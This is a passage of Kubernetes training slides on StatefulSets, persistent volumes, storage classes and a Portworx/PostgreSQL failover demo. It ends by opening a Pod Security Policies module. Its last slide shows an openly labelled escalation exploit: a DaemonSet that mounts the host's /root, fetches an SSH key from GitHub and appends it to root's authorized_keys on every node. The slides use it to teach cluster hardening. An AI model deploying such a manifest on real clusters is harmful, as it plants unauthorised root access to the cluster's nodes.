`volumeClaimTemplate` named `data` - then it will create pods `db-0`, `db-1`, `db-2` - these pods will have volumes named `data-db-0`, `data-db-1`, `data-db-2` .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Persistent Volume Claims are sticky - When updating the stateful set (e.g. image upgrade), each pod keeps its volume - When pods get rescheduled (e.g.
node failure), they keep their volume (this requires a storage system that is not node-local) - These volumes are not automatically deleted (when the stateful set is scaled down or deleted) - If a stateful set is scaled back up later, the pods get their data back .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Dynamic provisioners - A *dynamic provisioner* monitors unbound PVCs - It can create volumes (and the corresponding PV) on the fly - This requires the PVCs to have a *storage class* (annotation `volume.beta.kubernetes.io/storage-provisioner`) - A dynamic provisioner only acts on PVCs with the right storage class (it ignores the other ones) - Just like `LoadBalancer` services, dynamic provisioners are optional (i.e. our cluster may or may not have one pre-installed) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## What's a Storage Class? - A Storage Class is yet another Kubernetes API resource (visible with e.g. `kubectl get storageclass` or `kubectl get sc`) - It indicates which *provisioner* to use (which controller will create the actual volume) - And arbitrary parameters for that provisioner (replication levels, type of disk ... anything relevant!) - Storage Classes are required if we want to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/) (but we can also create volumes manually, and ignore Storage Classes) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## The default storage class - At most one storage class can be marked as the default class (by annotating it with `storageclass.kubernetes.io/is-default-class=true`) - When a PVC is created, it will be annotated with the default storage class (unless it specifies an explicit storage class) - This only happens at PVC creation (existing PVCs are not updated when we mark a class as the default one) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Dynamic provisioning setup This is how we can achieve fully automated provisioning of persistent storage. 1. Configure a storage system. (It needs to have an API, or be capable of automated provisioning of volumes.) 2. Install a dynamic provisioner for this storage system. (This is some specific controller code.) 3. Create a Storage Class for this system. (It has to match what the dynamic provisioner is expecting.) 4. Annotate the Storage Class to be the default one. .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Dynamic provisioning usage After setting up the system (previous slide), all we need to do is: *Create a Stateful Set that makes use of a `volumeClaimTemplate`.* This will trigger the following actions. 1. The Stateful Set creates PVCs according to the `volumeClaimTemplate`. 2. The Stateful Set creates Pods using these PVCs. 3. The PVCs are automatically annotated with our Storage Class. 4. The dynamic provisioner provisions volumes and creates the corresponding PVs. 5. The PersistentVolumeClaimBinder associates the PVs and the PVCs together. 6. PVCs are now bound, the Pods can start. ??? 
:EN:- Deploying apps with Stateful Sets :EN:- Example: deploying a Consul cluster :EN:- Understanding Persistent Volume Claims and Storage Classes :FR:- Déployer une application avec un *Stateful Set* :FR:- Exemple : lancer un cluster Consul :FR:- Comprendre les *Persistent Volume Claims* et *Storage Classes* .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/ShippingContainerSFBay.jpg)] --- name: toc-local-persistent-volumes class: title Local Persistent Volumes .nav[ [Previous section](#toc-persistent-volumes-claims) | [Back to table of contents](#toc-module-4) | [Next section](#toc-highly-available-persistent-volumes) ] .debug[(automatically generated title slide)] --- # Local Persistent Volumes - We want to run that Consul cluster *and* actually persist data - But we don't have a distributed storage system - We are going to use local volumes instead (similar conceptually to `hostPath` volumes) - We can use local volumes without installing extra plugins - However, they are tied to a node - If that node goes down, the volume becomes unavailable .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## With or without dynamic provisioning - We will deploy a Consul cluster *with* persistence - That cluster's StatefulSet will create PVCs - These PVCs will remain unbound¹, until we create local volumes manually (we will basically do the job of the dynamic provisioner) - Then, we will see how to automate that with a dynamic provisioner .footnote[¹Unbound = without an associated Persistent Volume.] .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## If we have a dynamic provisioner ... - The labs in this section assume that we *do not* have a dynamic provisioner - If we do have one, we need to disable it .exercise[ - Check if we have a dynamic provisioner: ```bash kubectl get storageclass ``` - If the output contains a line with `(default)`, run this command: ```bash kubectl annotate sc storageclass.kubernetes.io/is-default-class- --all ``` - Check again that it is no longer marked as `(default)` ] .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Deploying Consul - We will use a slightly different YAML file - The only differences between that file and the previous one are: - `volumeClaimTemplate` defined in the Stateful Set spec - the corresponding `volumeMounts` in the Pod spec - the label `consul` has been changed to `persistentconsul`
(to avoid conflicts with the other Stateful Set) .exercise[ - Apply the persistent Consul YAML file: ```bash kubectl apply -f ~/container.training/k8s/persistent-consul.yaml ``` ] .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Observing the situation - Let's look at Persistent Volume Claims and Pods .exercise[ - Check that we now have an unbound Persistent Volume Claim: ```bash kubectl get pvc ``` - We don't have any Persistent Volume: ```bash kubectl get pv ``` - The Pod `persistentconsul-0` is not scheduled yet: ```bash kubectl get pods -o wide ``` ] *Hint: leave these commands running with `-w` in different windows.* .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Explanations - In a Stateful Set, the Pods are started one by one - `persistentconsul-1` won't be created until `persistentconsul-0` is running - `persistentconsul-0` has a dependency on an unbound Persistent Volume Claim - The scheduler won't schedule the Pod until the PVC is bound (because the PVC might be bound to a volume that is only available on a subset of nodes; for instance, EBS volumes are tied to an availability zone) .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Creating Persistent Volumes - Let's create 3 local directories (`/mnt/consul`) on node2, node3, node4 - Then create 3 Persistent Volumes corresponding to these directories .exercise[ - Create the local directories: ```bash for NODE in node2 node3 node4; do ssh $NODE sudo mkdir -p /mnt/consul done ``` - Create the PV objects: ```bash kubectl apply -f ~/container.training/k8s/volumes-for-consul.yaml ``` ] .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Check our Consul cluster - The PVs that we created will be automatically matched with the PVCs - Once a PVC is bound, its pod can start normally - Once the pod `persistentconsul-0` has started, `persistentconsul-1` can be created, etc. - Eventually, our Consul cluster is up, and backed by "persistent" volumes .exercise[ - Check that our Consul cluster indeed has 3 members: ```bash kubectl exec persistentconsul-0 consul members ``` ] .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Devil is in the details (1/2) - The size of the Persistent Volumes is bogus (it is used when matching PVs and PVCs together, but there is no actual quota or limit) .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Devil is in the details (2/2) - This specific example worked because we had exactly 1 free PV per node: - if we had created multiple PVs per node ... - we could have ended up with two PVCs bound to PVs on the same node ... - which would have required two pods to be on the same node ...
- which is forbidden by the anti-affinity constraints in the StatefulSet - To avoid that, we need to associate the PVs with a Storage Class that has: ```yaml volumeBindingMode: WaitForFirstConsumer ``` (this means that a PVC will be bound to a PV only after being used by a Pod) - See [this blog post](https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/) for more details .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Bulk provisioning - It's not practical to manually create directories and PVs for each app - We *could* pre-provision a number of PVs across our fleet - We could even automate that with a Daemon Set: - creating a number of directories on each node - creating the corresponding PV objects - We also need to recycle volumes - ... This can quickly get out of hand .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Dynamic provisioning - We could also write our own provisioner, which would: - watch the PVCs across all namespaces - when a PVC is created, create a corresponding PV on a node - Or we could use one of the dynamic provisioners for local persistent volumes (for instance the [Rancher local path provisioner](https://github.com/rancher/local-path-provisioner)) .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Strategies for local persistent volumes - Remember, when a node goes down, the volumes on that node become unavailable - High availability will require another layer of replication (like what we've just seen with Consul; or primary/secondary; etc) - Pre-provisioning PVs makes sense for machines with local storage (e.g. cloud instance storage; or storage directly attached to a physical machine) - Dynamic provisioning makes sense for a large number of applications (when we can't or won't dedicate a whole disk to a volume) - It's possible to mix both (using distinct Storage Classes) ??? :EN:- Static vs dynamic volume provisioning :EN:- Example: local persistent volume provisioner :FR:- Création statique ou dynamique de volumes :FR:- Exemple : création de volumes locaux .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/aerial-view-of-containers.jpg)] --- name: toc-highly-available-persistent-volumes class: title Highly available Persistent Volumes .nav[ [Previous section](#toc-local-persistent-volumes) | [Back to table of contents](#toc-module-4) | [Next section](#toc-bonus-material) ] .debug[(automatically generated title slide)] --- # Highly available Persistent Volumes - How can we achieve true durability? - How can we store data that would survive the loss of a node?
-- - We need to use Persistent Volumes backed by highly available storage systems - There are many ways to achieve that: - leveraging our cloud's storage APIs - using NAS/SAN systems or file servers - distributed storage systems -- - We are going to see one distributed storage system in action .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Our test scenario - We will set up a distributed storage system on our cluster - We will use it to deploy a SQL database (PostgreSQL) - We will insert some test data in the database - We will disrupt the node running the database - We will see how it recovers .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Portworx - Portworx is a *commercial* persistent storage solution for containers - It works with Kubernetes, but also Mesos, Swarm ... - It provides [hyper-converged](https://en.wikipedia.org/wiki/Hyper-converged_infrastructure) storage (=storage is provided by regular compute nodes) - We're going to use it here because it can be deployed on any Kubernetes cluster (it doesn't require any particular infrastructure) - We don't endorse or support Portworx in any particular way (but we appreciate that it's super easy to install!) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## A useful reminder - We're installing Portworx because we need a storage system - If you are using AKS, EKS, GKE ... you already have a storage system (but you might want another one, e.g. to leverage local storage) - If you have set up Kubernetes yourself, there are other solutions available too - on premises, you can use a good old SAN/NAS - on a private cloud like OpenStack, you can use e.g. Cinder - everywhere, you can use other systems, e.g. Gluster, StorageOS .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Installing Portworx - Portworx installation is relatively simple - ... But we made it *even simpler!* - We are going to use a YAML manifest that will take care of everything - Warning: this manifest is customized for a very specific setup (like the VMs that we provide during workshops and training sessions) - It will probably *not work* if you are using a different setup (like Docker Desktop, k3s, MicroK8S, Minikube ...) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## The simplified Portworx installer - The Portworx installation will take a few minutes - Let's start it, then we'll explain what happens behind the scenes .exercise[ - Install Portworx: ```bash kubectl apply -f ~/container.training/k8s/portworx.yaml ``` ] *Note: this was tested with Kubernetes 1.18. Newer versions may or may not work.* .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## What's in this YAML manifest?
- Portworx installation itself, pre-configured for our setup - A default *Storage Class* using Portworx - A *Daemon Set* to create loop devices on each node of the cluster .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Portworx installation - The official way to install Portworx is to use [PX-Central](https://central.portworx.com/) (this requires a free account) - PX-Central will ask us a few questions about our cluster (Kubernetes version, on-prem/cloud deployment, etc.) - Using our answers, it will generate a YAML manifest that we can use .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Portworx storage configuration - Portworx needs at least one *block device* - Block device = disk or partition on a disk - We can see block devices with `lsblk` (or `cat /proc/partitions` if we're old school like that!) - If we don't have a spare disk or partition, we can use a *loop device* - A loop device is a block device actually backed by a file - These are frequently used to mount ISO (CD/DVD) images or VM disk images .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Setting up a loop device - Our `portworx.yaml` manifest includes a *Daemon Set* that will: - create a 10 GB (empty) file on each node - load the `loop` module (if it's not already loaded) - associate a loop device with the 10 GB file - After these steps, we have a block device that Portworx can use .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Implementation details - The file is `/portworx.blk` (it is a [sparse file](https://en.wikipedia.org/wiki/Sparse_file) created with `truncate`) - The loop device is `/dev/loop4` - This can be verified by running `sudo losetup` - The *Daemon Set* uses a privileged *Init Container* - We can check the logs of that container with: ```bash kubectl logs --selector=app=setup-loop4-for-portworx \ -c setup-loop4-for-portworx ``` .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Waiting for Portworx to be ready - The installation process will take a few minutes .exercise[ - Check out the logs: ```bash stern -n kube-system portworx ``` - Wait until it gets quiet (you should see `portworx service is healthy`, too) ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Dynamic provisioning of persistent volumes - We are going to run PostgreSQL in a Stateful set - The Stateful set will specify a `volumeClaimTemplate` - That `volumeClaimTemplate` will create Persistent Volume Claims - Kubernetes' [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/) will satisfy these Persistent Volume Claims (by creating Persistent Volumes and binding them to the claims) - The Persistent Volumes are then available for the PostgreSQL pods .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Storage Classes - It's possible that multiple storage systems are available - Or, that a storage system offers multiple tiers of storage (SSD vs. magnetic; mirrored or not; etc.) 
- We need to tell Kubernetes *which* system and tier to use - This is achieved by creating a Storage Class - A `volumeClaimTemplate` can indicate which Storage Class to use - It is also possible to mark a Storage Class as "default" (it will be used if a `volumeClaimTemplate` doesn't specify one) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Check our default Storage Class - The YAML manifest applied earlier should define a default storage class .exercise[ - Check that we have a default storage class: ```bash kubectl get storageclass ``` ] There should be a storage class showing as `portworx-replicated (default)`. .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Our default Storage Class This is our Storage Class (in `k8s/storage-class.yaml`): ```yaml kind: StorageClass apiVersion: storage.k8s.io/v1beta1 metadata: name: portworx-replicated annotations: storageclass.kubernetes.io/is-default-class: "true" provisioner: kubernetes.io/portworx-volume parameters: repl: "2" priority_io: "high" ``` - It says "use Portworx to create volumes and keep 2 replicas of these volumes" - The annotation makes this Storage Class the default one .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Our Postgres Stateful set - The next slide shows `k8s/postgres.yaml` - It defines a Stateful set - With a `volumeClaimTemplate` requesting a 1 GB volume - That volume will be mounted to `/var/lib/postgresql/data` - There is another little detail: we enable the `stork` scheduler - The `stork` scheduler is optional (it's specific to Portworx) - It helps the Kubernetes scheduler to colocate the pod with its volume (see [this blog post](https://portworx.com/stork-storage-orchestration-kubernetes/) for more details about that) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- .small[ ```yaml apiVersion: apps/v1 kind: StatefulSet metadata: name: postgres spec: selector: matchLabels: app: postgres serviceName: postgres template: metadata: labels: app: postgres spec: schedulerName: stork containers: - name: postgres image: postgres:12 env: - name: POSTGRES_HOST_AUTH_METHOD value: trust volumeMounts: - mountPath: /var/lib/postgresql/data name: postgres volumeClaimTemplates: - metadata: name: postgres spec: accessModes: ["ReadWriteOnce"] resources: requests: storage: 1Gi ``` ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Creating the Stateful set - Before applying the YAML, watch what's going on with `kubectl get events -w` .exercise[ - Apply that YAML: ```bash kubectl apply -f ~/container.training/k8s/postgres.yaml ``` ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Testing our PostgreSQL pod - We will use `kubectl exec` to get a shell in the pod - Good to know: we need to use the `postgres` user in the pod .exercise[ - Get a shell in the pod, as the `postgres` user: ```bash kubectl exec -ti postgres-0 su postgres ``` - Check that default databases have been created correctly: ```bash psql -l ``` ] (This should show us 3 lines: postgres, template0, and template1.) 
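Side note: the `volumeClaimTemplate` shown earlier generates one PVC per pod (Kubernetes creates it for us). For `postgres-0`, that claim would look roughly like the sketch below; the name follows the `<template name>-<pod name>` pattern, and the storage class shown here assumes that `portworx-replicated` is indeed the default class on our cluster.

```yaml
# Sketch of the PVC generated for pod postgres-0
# (created automatically by Kubernetes; shown for illustration only)
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
  name: postgres-postgres-0
spec:
  accessModes:
  - ReadWriteOnce
  resources:
    requests:
      storage: 1Gi
  storageClassName: portworx-replicated
```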
.debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Inserting data in PostgreSQL - We will create a database and populate it with `pgbench` .exercise[ - Create a database named `demo`: ```bash createdb demo ``` - Populate it with `pgbench`: ```bash pgbench -i demo ``` ] - The `-i` flag means "create tables" - If you want more data in the test tables, add e.g. `-s 10` (to get 10x more rows) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Checking how much data we have now - The `pgbench` tool inserts rows in table `pgbench_accounts` .exercise[ - Check that the `demo` database exists: ```bash psql -l ``` - Check how many rows we have in `pgbench_accounts`: ```bash psql demo -c "select count(*) from pgbench_accounts" ``` - Check that `pgbench_history` is currently empty: ```bash psql demo -c "select count(*) from pgbench_history" ``` ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Testing the load generator - Let's use `pgbench` to generate a few transactions .exercise[ - Run `pgbench` for 10 seconds, reporting progress every second: ```bash pgbench -P 1 -T 10 demo ``` - Check the size of the history table now: ```bash psql demo -c "select count(*) from pgbench_history" ``` ] Note: on small cloud instances, a typical speed is about 100 transactions/second. .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Generating transactions - Now let's use `pgbench` to generate more transactions - While it's running, we will disrupt the database server .exercise[ - Run `pgbench` for 10 minutes, reporting progress every second: ```bash pgbench -P 1 -T 600 demo ``` - You can use a longer time period if you need more time to run the next steps ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Find out which node is hosting the database - We can find that information with `kubectl get pods -o wide` .exercise[ - Check the node running the database: ```bash kubectl get pod postgres-0 -o wide ``` ] We are going to disrupt that node. -- By "disrupt" we mean: "disconnect it from the network".
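Another side note: the Stateful Set we created references a governing Service (`serviceName: postgres`), which is what gives each pod a stable network identity (e.g. `postgres-0.postgres`). That Service is not shown in these slides; a minimal sketch of what `k8s/postgres.yaml` presumably provides (an assumption, not a verbatim copy) could look like this:

```yaml
# Hypothetical sketch of the headless service governing the postgres Stateful Set
# (clusterIP: None makes it headless; the selector and port are assumptions)
apiVersion: v1
kind: Service
metadata:
  name: postgres
spec:
  clusterIP: None
  selector:
    app: postgres
  ports:
  - name: postgres
    port: 5432
```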
.debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Disconnect the node - We will use `iptables` to block all traffic exiting the node (except SSH traffic, so we can repair the node later if needed) .exercise[ - SSH to the node to disrupt: ```bash ssh `nodeX` ``` - Allow SSH traffic leaving the node, but block all other traffic: ```bash sudo iptables -I OUTPUT -p tcp --sport 22 -j ACCEPT sudo iptables -I OUTPUT 2 -j DROP ``` ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Check that the node is disconnected .exercise[ - Check that the node can't communicate with other nodes: ``` ping node1 ``` - Log out to go back to `node1` - Watch the events unfolding with `kubectl get events -w` and `kubectl get pods -w` ] - It will take some time for Kubernetes to mark the node as unhealthy - Then it will attempt to reschedule the pod to another node - In about a minute, our pod should be up and running again .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Check that our data is still available - We are going to reconnect to the (new) pod and check .exercise[ - Get a shell on the pod: ```bash kubectl exec -ti postgres-0 su postgres ``` - Check how many transactions are now in the `pgbench_history` table: ```bash psql demo -c "select count(*) from pgbench_history" ``` ] If the 10-second test that we ran earlier gave e.g. 80 transactions per second, and we failed the node after 30 seconds, we should have about 2400 rows in that table. .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Double-check that the pod has really moved - Just to make sure the system is not bluffing!
.exercise[ - Look at which node the pod is now running on ```bash kubectl get pod postgres-0 -o wide ``` ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Re-enable the node - Let's fix the node that we disconnected from the network .exercise[ - SSH to the node: ```bash ssh `nodeX` ``` - Remove the iptables rule blocking traffic: ```bash sudo iptables -D OUTPUT 2 ``` ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## A few words about this PostgreSQL setup - In a real deployment, you would want to set a password - This can be done by creating a `secret`: ``` kubectl create secret generic postgres \ --from-literal=password=$(base64 /dev/urandom | head -c16) ``` - And then passing that secret to the container: ```yaml env: - name: POSTGRES_PASSWORD valueFrom: secretKeyRef: name: postgres key: password ``` .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Troubleshooting Portworx - If we need to see what's going on with Portworx: ``` PXPOD=$(kubectl -n kube-system get pod -l name=portworx -o json | jq -r .items[0].metadata.name) kubectl -n kube-system exec $PXPOD -- /opt/pwx/bin/pxctl status ``` - We can also connect to Lighthouse (a web UI) - check the port with `kubectl -n kube-system get svc px-lighthouse` - connect to that port - the default login/password is `admin/Password1` - then specify `portworx-service` as the endpoint .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Removing Portworx - Portworx provides a storage driver - It needs to place itself "above" the Kubelet (it installs itself straight on the nodes) - To remove it, we need to do more than just deleting its Kubernetes resources - It is done by applying a special label: ``` kubectl label nodes --all px/enabled=remove --overwrite ``` - Then removing a bunch of local files: ``` sudo chattr -i /etc/pwx/.private.json sudo rm -rf /etc/pwx /opt/pwx ``` (on each node where Portworx was running) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Dynamic provisioning without a provider - What if we want to use Stateful sets without a storage provider? 
- We will have to create volumes manually (by creating Persistent Volume objects) - These volumes will be automatically bound to matching Persistent Volume Claims - We can use local volumes (essentially bind mounts of host directories) - Of course, these volumes won't be available in case of node failure - Check [this blog post](https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/) for more information and gotchas .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Acknowledgements The Portworx installation tutorial, and the PostgreSQL example, were inspired by [Portworx examples on Katacoda](https://katacoda.com/portworx/scenarios/), in particular: - [installing Portworx on Kubernetes](https://www.katacoda.com/portworx/scenarios/deploy-px-k8s) (with adaptations to use a loop device and an embedded key/value store) - [persistent volumes on Kubernetes using Portworx](https://www.katacoda.com/portworx/scenarios/px-k8s-vol-basic) (with adaptations to specify a default Storage Class) - [HA PostgreSQL on Kubernetes with Portworx](https://www.katacoda.com/portworx/scenarios/px-k8s-postgres-all-in-one) (with adaptations to use a Stateful Set and simplify PostgreSQL's setup) ??? :EN:- Using highly available persistent volumes :EN:- Example: deploying a database that can withstand node outages :FR:- Utilisation de volumes à haute disponibilité :FR:- Exemple : déployer une base de données survivant à la défaillance d'un nœud .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: title, self-paced Thank you! .debug[[shared/thankyou.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/thankyou.md)] --- class: title, in-person That's all, folks!
Questions? ![end](images/end.jpg) .debug[[shared/thankyou.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/thankyou.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/blue-containers.jpg)] --- name: toc-bonus-material class: title (Bonus material) .nav[ [Previous section](#toc-highly-available-persistent-volumes) | [Back to table of contents](#toc-module-5) | [Next section](#toc-pod-security-policies) ] .debug[(automatically generated title slide)] --- # (Bonus material) .debug[[4.yml](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/4.yml)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/chinook-helicopter-container.jpg)] --- name: toc-pod-security-policies class: title Pod Security Policies .nav[ [Previous section](#toc-bonus-material) | [Back to table of contents](#toc-module-5) | [Next section](#toc-designing-an-operator) ] .debug[(automatically generated title slide)] --- # Pod Security Policies - By default, our pods and containers can do *everything* (including taking over the entire cluster) - We are going to show an example of a malicious pod - Then we will explain how to avoid this with PodSecurityPolicies - We will enable PodSecurityPolicies on our cluster - We will create a couple of policies (restricted and permissive) - Finally we will see how to use them to improve security on our cluster .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Setting up a namespace - For simplicity, let's work in a separate namespace - Let's create a new namespace called "green" .exercise[ - Create the "green" namespace: ```bash kubectl create namespace green ``` - Change to that namespace: ```bash kns green ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Creating a basic Deployment - Just to check that everything works correctly, deploy NGINX .exercise[ - Create a Deployment using the official NGINX image: ```bash kubectl create deployment web --image=nginx ``` - Confirm that the Deployment, ReplicaSet, and Pod exist, and that the Pod is running: ```bash kubectl get all ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## One example of malicious pods - We will now show an escalation technique in action - We will deploy a DaemonSet that adds our SSH key to the root account (on *each* node of the cluster) - The Pods of the DaemonSet will do so by mounting `/root` from the host .exercise[ - Check the file `k8s/hacktheplanet.yaml` with a text editor: ```bash vim ~/container.training/k8s/hacktheplanet.yaml ``` - If you would like, change the SSH key (by changing the GitHub user name) ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Deploying the malicious pods - Let's deploy our "exploit"! 
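- If you don't have the training repository handy, here is a rough sketch of what such a DaemonSet could look like (a hypothetical manifest; the actual `k8s/hacktheplanet.yaml` may differ in its details):

```yaml
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hacktheplanet
spec:
  selector:
    matchLabels:
      app: hacktheplanet
  template:
    metadata:
      labels:
        app: hacktheplanet
    spec:
      volumes:
      - name: root
        hostPath:
          path: /root            # the host's /root directory, mounted in the pod
      containers:
      - name: hacktheplanet
        image: alpine
        volumeMounts:
        - name: root
          mountPath: /root
        command:
        - sh
        - -c
        - |
          # Fetch a public SSH key from GitHub (replace the user name with your own)
          # and add it to the node's root account
          mkdir -p /root/.ssh
          wget -qO- https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys
          # Sleep so the container doesn't exit (and get restarted) right away
          sleep 86400
```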
